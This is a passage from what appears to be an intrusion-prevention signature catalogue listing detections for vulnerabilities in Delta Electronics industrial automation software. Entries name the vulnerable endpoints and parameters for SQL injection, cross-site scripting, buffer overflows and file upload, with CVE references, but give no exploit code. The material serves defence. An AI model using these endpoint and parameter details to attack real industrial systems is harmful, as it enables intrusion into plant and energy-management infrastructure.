Situation: File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-Element-Name-Stack-BOF
References:
CVE-2020-16199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16199
Back to top

Delta-Industrial-Automation-CNCSoft-Screeneditor-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Delta Electronics CNCSoft
Risk: Moderate
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Delta Electronics CNCSoft
Type: Buffer Overflow
Description: There has been reported a stack-based buffer overflow in Delta Industrial Automation CNCSoft ScreenEditor. Successful exploitation could lead in arbitrary code execution.
Situation: File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-Stack-Buffer-Overflow
References:
CVE-2019-10947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10947
Back to top

Delta-Industrial-Automation-Diaenergie-Am_Handler-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper input validation when processing the type parameter in the AM_Handler.ashx endpoint causes an SQL injection vulnerability in Delta DIAEnergie. A successful attack may result in code execution with the privileges of NT SERVICE\MSSQLSERVER.
Situation: HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Am_Handler-SQL-Injection
References:
CVE-2021-38391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38391
Back to top

Delta-Industrial-Automation-Diaenergie-Am_Handler-TP-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1484-5242
Last changed: sgpkg-ips-1484-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Insufficient input validation when processing tp parameters with requests sent to the AM_Handler.ashx endpoint causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary code on the target system with system privileges.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Am_Handler-TP-SQL-Injection
Back to top

Delta-Industrial-Automation-Diaenergie-Astlistparameters-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper input validation in the GetDIAE_astListParameters component causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit may allow an attacker to execute arbitrary SQL oe even gain the ability of remote code execution in the context of MSSQLSERVER.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Astlistparameters-SQL-Injection
References:
CVE-2024-28040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28040
Back to top

Delta-Industrial-Automation-Diaenergie-Checkdiacloud-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Insufficient input validation when processing requests to the CheckDIACloud endpoint causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Checkdiacloud-SQL-Injection
References:
CVE-2022-41773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41773
Back to top

Delta-Industrial-Automation-Diaenergie-Checkiothubnameexisted-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1527-5242
Last changed: sgpkg-ips-1527-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Insufficient input validation in the CheckIoTHubNameExisted endpoint causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit can allow an attacker to execute arbitrary code with the privileges of SERVICE\MSSQLSERVER.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Checkiothubnameexisted-SQL-Injection
References:
CVE-2022-40967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40967
Back to top

Delta-Industrial-Automation-Diaenergie-CVE-2021-32955-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: There exists an arbitrary file upload vulnerability in Delta Industrial Automation DIAEnergie. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CSU-Delta-Industrial-Automation-Diaenergie-CVE-2021-32955-Arbitrary-File-Upload
References:
CVE-2021-32955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32955
Back to top

Delta-Industrial-Automation-Diaenergie-CVE-2022-41133-SQL-Injection

About this vulnerability: A vulnerability in Delta Industrial Automation DIAEnergie.
Risk: High
First detected in: sgpkg-ips-1534-5242
Last changed: sgpkg-ips-1534-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: SQL Injection
Description: A vulnerability in Delta Industrial Automation DIAEnergie, versions before 1.9.01.002, which allows remote attackers to execute arbitrary code on the target server by sending a specially crafted request, due to insufficient input validation when processing requests to the GetDIAE_line_message_settingsListParameters endpoint.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-CVE-2022-41133-SQL-Injection
References:
CVE-2022-41133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41133
Back to top

Delta-Industrial-Automation-Diaenergie-Diae_loopmaphandler.ashx-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: High
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: An SQL injection has been reported in Delta Industrial Automation DIAEnergie. The vulnerability is due to insufficient input validation when processing requests to the DIAE_loopmapHandler.ashx endpoint. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request. Successful exploitation could result in the execution of arbitrary code on the target system within the context of NT SERVICE\MSSQLSERVER.
Situation: HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Diae_loopmaphandler.ashx-SQL-Injection
References:
CVE-2022-26887
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26887
Back to top

Delta-Industrial-Automation-Diaenergie-Diae_Phandler-Getobject-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1477-5242
Last changed: sgpkg-ips-1477-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper input validation for the pKid parameter in the DIAE_pgHandler.ashx endpoint causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute code as NT SERVICE\MSSQLSERVER.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Diae_Phandler-Getobject-SQL-Injection
References:
CVE-2022-1378
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1378
Back to top

Delta-Industrial-Automation-Diaenergie-Diae_taghandler.ashx-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: An SQL injection vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation in the DIAE_tagHandler.ashx script. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Diae_taghandler.ashx-SQL-Injection
References:
CVE-2024-25937
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25937
Back to top

Delta-Industrial-Automation-Diaenergie-Dmdsethandler-Order_By-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper validation of the order_by parameter in DIAE_dmdsetHandler.ashx endpoint causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary code with the privileges of the SQL server.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Dmdsethandler-Order_By-SQL-Injection
References:
CVE-2022-26013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26013
Back to top

Delta-Industrial-Automation-Diaenergie-Ftyinfosetting-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper input validation in the FtyInfoSetting.aspx endpoint causes an SQL injection vulnerability in Delta DIAEnergie. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Ftyinfosetting-SQL-Injection
References:
CVE-2022-43452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43452
Back to top

Delta-Industrial-Automation-Diaenergie-Getdiacloudlist-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1733-5242
Last changed: sgpkg-ips-1733-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: An SQL injection vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation in the GetDIACloudList endpoint. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of MSSQLSERVER.
Situation: HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Getdiacloudlist-SQL-Injection
References:
CVE-2024-34032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34032
Back to top

Delta-Industrial-Automation-Diaenergie-GetDIAE_sloglistparameters-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: An SQL injection vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation in the GetDIAE_slogListParameters component. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting these vulnerabilities could result in SQL injection or, in the worst case, remote code execution in the context of MSSQLSERVER.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-GetDIAE_sloglistparameters-SQL-Injection
References:
CVE-2024-23975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23975
Back to top

Delta-Industrial-Automation-Diaenergie-GetDIAE_unListParameters-SQL-Injection

About this vulnerability: An attempt to exploit a vulnerability in Delta Industrial Automation DIAEnergie detected
Risk: High
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: A vulnerability in Delta Industrial Automation DIAEnergie, versions before 1.10.00.005, which allows remote attackers to execute arbitrary SQL commands, due to improper input validation in the GetDIAE_unListParameters component.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-GetDIAE_unListParameters-SQL-Injection
References:
CVE-2024-23494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23494
Back to top

Delta-Industrial-Automation-Diaenergie-GetDIAE_usListParameters-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: High
First detected in: sgpkg-ips-1712-5242
Last changed: sgpkg-ips-1712-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: An SQL injection vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation in the "GetDIAE_usListParameters" component. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting these vulnerabilities could result in SQL injection or, in the worst case, remote code execution in the context of MSSQLSERVER.
Situation: HTTP_CSU-Delta-Industrial-Automation-Diaenergie-GetDIAE_usListParameters-SQL-Injection
References:
CVE-2024-25574
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25574
Back to top

Delta-Industrial-Automation-Diaenergie-Handler-TCV-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie.
Risk: High
First detected in: sgpkg-ips-1480-5242
Last changed: sgpkg-ips-1480-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: SQL Injection
Description: A vulnerability in Delta Electronics DIAEnergie, versions prior to 1.8.02.004, which allows remote attackers to execute arbitrary SQL commands via specially crafted requests, due to insufficient input validation when processing requests to the Handler_TCV.ashx endpoint.
Situation: HTTP_CS-Delta-Industrial-Automation-Diaenergie-Handler-TCV-SQL-Injection
References:
CVE-2022-1367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1367
Back to top

Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-Cross-Site-Scripting

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1424-5242
Last changed: sgpkg-ips-1424-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper input validation when handling the name parameter in the HandlerAlarmGroup.ashx endpoint causes a cross-site scripting vulnerability in Delta DIAEnergie. A successful exploit allows an attacker to run arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-Stored-Cross-Site-Scripting
References:
CVE-2021-44471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44471
Back to top

Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper validation of the agid parameter in HandlerAlarmGroup.ashx endpoint of Delta Electronics DIAEnergie causes an SQL injection vulnerability which can be exploited to run arbitrary code within the context of NT SERVICE\MSSQLSERVER.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-SQL-Injection
References:
CVE-2021-38393
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38393
Back to top

Delta-Industrial-Automation-Diaenergie-Handlerchart.ashx-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: High
First detected in: sgpkg-ips-1499-5242
Last changed: sgpkg-ips-1499-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: An SQL injection has been reported in Delta Industrial Automation DIAEnergie. The vulnerability is due to insufficient input validation when processing requests to the HandlerChart.ashx endpoint. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request. Successful exploitation could result in the execution of arbitrary code on the target system within the context of NT SERVICE\MSSQLSERVER.
Situation: HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Handlerchart.ashx-SQL-Injection
References:
CVE-2022-1366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1366
Back to top

Delta-Industrial-Automation-Diaenergie-HandlerEnergyType-Stored-CSS

About this vulnerability: A vulnerability in Delta Industrial Automation DIAEnergie.
Risk: High
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1428-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: A vulnerability in Delta Industrial Automation DIAEnergie, versions 1.7.5 and before, which allows remote attackers to execute arbitrary scripts by sending a crafted request, due to an input validation error when processing parameters in HandlerEnergyType.ashx endpoint.
Situation: HTTP_CSU-Delta-Industrial-Automation-Diaenergie-HandlerEnergyType-Stored-CSS
References:
CVE-2021-44544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44544
Back to top

Delta-Industrial-Automation-Diaenergie-Handlerenergytype.aspx-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: High
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1394-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: An SQL injection has been reported in Delta Industrial Automation DIAEnergie. The vulnerability is due to input validation error when processing egyid parameter in HandlerEnergyType.ashx endpoint. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request. Successful exploitation could result in the execution of arbitrary code on the target system within context of NT SERVICE\MSSQLSERVER.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handlerenergytype.aspx-SQL-Injection
References:
CVE-2021-38390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38390
Back to top

Delta-Industrial-Automation-Diaenergie-Handlerpagep_Kid-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1528-5242
Last changed: sgpkg-ips-1528-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper input validation for the HandlerPageP_KID process causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successfule exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handlerpagep_Kid-SQL-Injection
References:
CVE-2022-43774
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43774
Back to top

Delta-Industrial-Automation-Diaenergie-Handlertag_Kid-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: High
First detected in: sgpkg-ips-1540-5242
Last changed: sgpkg-ips-1540-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: A SQL injection vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation for the HandlerTag_KID.ashx endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection. The vendor, Delta Industrial Automation, has not released an advisory regarding this vulnerability.
Situation: HTTP_CSU-Delta-Industrial-Automation-Diaenergie-Handlertag_Kid-SQL-Injection
References:
CVE-2022-43775
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43775
Back to top

Delta-Industrial-Automation-Diaenergie-Handler_Cfg-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1389-5242
Last changed: sgpkg-ips-1389-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper input validation in the Handler_CFG.ashx endpoint causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary code on the target system within context of NT SERVICE\MSSQLSERVER.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handler_Cfg-SQL-Injection
References:
CVE-2021-32983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32983
Back to top

Delta-Industrial-Automation-Diaenergie-Handler_Cfg-Visual_Q_Add-SQL-Injection

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper input validation in the Visual_Q_Add component of the Handler_CFG.ashx endpoint causes an SQL injection vulnerability in Delta DIAEnergie. A successful exploitation allows an attacker to execute SQL on the target system.
Situation: File-Text_Delta-Industrial-Automation-Diaenergie-Handler_Cfg-Visual_Q_Add-SQL-Injection
References:
CVE-2024-42417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42417
Back to top

Delta-Industrial-Automation-Diaenergie-Hierarchyhandler-Cross-Site-Scripting

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1426-5242
Last changed: sgpkg-ips-1426-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper validation of parameters sent to the DIAE_hierarchyHandler.ashx endpoint causes a cross-site scripting vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Hierarchyhandler-Stored-Cross-Site-Scripting
References:
CVE-2021-31558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31558
Back to top

Delta-Industrial-Automation-Diaenergie-Insertreg-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1547-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper input validation for the InsertReg process causes a cross-site scripting vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Insertreg-Stored-Cross-Site-Scripting
References:
CVE-2022-41702
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41702
Back to top

Delta-Industrial-Automation-Diaenergie-Postenergytype-XSS

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1536-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation for the PostEnergyType process. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: File-Text_Delta-Industrial-Automation-Diaenergie-Postenergytype-Stored-Cross-Site-Scripting
References:
CVE-2022-40965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40965
Back to top

Delta-Industrial-Automation-Diaenergie-Putlinemessagesetting-Stored-XSS

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper input validation of objects inincoming HTTP PUT requests causes a stored cross-site script vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Putlinemessagesetting-Stored-XSS
References:
CVE-2022-41555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41555
Back to top

Delta-Industrial-Automation-Diaenergie-Putshift-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1535-5242
Last changed: sgpkg-ips-1535-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper input validation for the PutShift process causes a stored cross-site scripting vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Putshift-Stored-Cross-Site-Scripting
References:
CVE-2022-41701
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41701
Back to top

Delta-Industrial-Automation-Diaenergie-Setpf-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1552-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for Delta Industrial Automation DIAEnergie. This vulnerability is due to improper input validation for the SetPF process. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser. The vendor, Delta Industrial Automation, has not released an advisory regarding this vulnerability.
Situation: File-Text_Delta-Industrial-Automation-Diaenergie-Setpf-Stored-Cross-Site-Scripting
References:
CVE-2022-41651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41651
Back to top

Delta-Industrial-Automation-Diaenergie-SQL-Injection-CVE-2024-28891

About this vulnerability: A vulnerability in Delta Electronics DIAEnergie
Risk: Moderate
First detected in: sgpkg-ips-1725-5242
Last changed: sgpkg-ips-1725-5242
Platform: Generic
Software: Delta Electronics DIAEnergie
Type: Input Validation
Description: Improper input validation in the Handler_CFG.ashx script causes an SQL injection vulnerability in Delta Electronics DIAEnergie. A successful exploit allows an attacker to execute arbitrary SQL on the target system or even execute arbitrary code with the privileges of the SQL server.
Situation: HTTP_CRL-Delta-Industrial-Automation-Diaenergie-SQL-Injection-CVE-2024-28891
References:
CVE-2024-28891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28891
Back to top

Delta-Industrial-Automation-Dialink-Events-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Delta Industrial Automation DIALink.
Risk: High
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1462-5242
Platform: Generic
Software: Delta Electronics DIALink
Type: Input Validation
Description: A vulnerability in Delta Industrial Automation DIALink, versions 1.3.1.0 and prior, which allows remote attackers to execute arbitrary scripts by sending crafted requests, due to input validation error when processing comment parameter in events endpoint.
Situation: HTTP_CS-Delta-Industrial-Automation-Dialink-Events-Stored-Cross-Site-Scripting
References:
CVE-2021-38488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38488
Back to top

Delta-Industrial-Automation-Dialink-Schedule-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Delta Electronics DIALink
Risk: Moderate
First detected in: sgpkg-ips-1434-5242
Last changed: sgpkg-ips-1434-5242
Platform: Generic
Software: Delta Electronics DIALink
Type: Input Validation
Description: Improper processing of parameters sent to the schedule endpoint causes a cross-site scripting vulnerability in Delta Electronics DIALink. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Delta-Industrial-Automation-Dialink-Schedule-Stored-Cross-Site-Scripting
References:
CVE-2021-38428
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38428
Back to top

Delta-Industrial-Automation-Diascreen-Dpa-File-Parsing-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Delta Electronics DIAScreen
Risk: Moderate
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: Delta Electronics DIAScreen
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability has been reported in Delta Industrial Automation DIAScreen. The vulnerability is due to lack of proper validation of the length of user-supplied data prior to copying to a fixed-length stack buffer. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted DPA file. Successful exploitation could result in execution of arbitrary code under the security context of the current process.
Situation: File-Binary_Delta-Industrial-Automation-Diascreen-Dpa-File-Parsing-Stack-Buffer-Overflow
References:
CVE-2023-0250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0250
Back to top

Delta-Industrial-Automation-DOPSoft-DPS-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Delta Industrial Automation DOPSoft.
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Generic
Software: Delta Industrial Automation DOPSoft
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability in Delta Industrial Automation DOPSoft, versions 2.00.07 and before, which allows remote attackers to execute arbitrary code by enticing a target user into opening a crafted DPS file, due to improper handling of the CWPFile section in DPS files.
Situation: File-Binary_Delta-Industrial-Automation-DOPSoft-DPS-Stack-Buffer-Overflow
References:
CVE-2021-38402
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38402
Back to top

Delta-Industrial-Automation-DOPSoft-XLS-CFB-Header-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Delta Industrial Automation DOPSoft.
Risk: High
First detected in: sgpkg-ips-1421-5242
Last changed: sgpkg-ips-1421-5242
Platform: Generic
Software: Delta Industrial Automation DOPSoft
Type: Malfunction
Description: A vulnerability in Delta Industrial Automation DOPSoft, versions 2.00.07 and prior, which allows remote attackers to execute arbitrary code by sending a crafted XLS file, due to the improper handling of the CFB file header in XLS files.
Situation: File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-CFB-Header-Parsing-Memory-Corruption
References:
CVE-2021-38406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38406
Back to top

Delta-Industrial-Automation-DOPSoft-XLS-Index-Record-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Delta Industrial Automation DOPSoft
Risk: Moderate
First detected in: sgpkg-ips-1425-5242
Last changed: sgpkg-ips-1425-5242
Platform: Generic
Software: Delta Industrial Automation DOPSoft
Type: Buffer Overflow
Description: A heap-based buffer overflow vulnerability has been reported in Delta Industrial Automation DOPSoft. The vulnerability is due to improper handling of Index records in XLS files. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted XLS file. Successful exploitation could result in execution of arbitrary code under the security context of the user running DOPSoft.
Situation: File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-Index-Record-Parsing-Buffer-Overflow
References:
CVE-2021-38406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38406
Back to top

Delta-Industrial-Automation-DOPSoft-XLS-Labelsst-Memory-Corruption

About this vulnerability: A vulnerability in Delta Industrial Automation DOPSoft
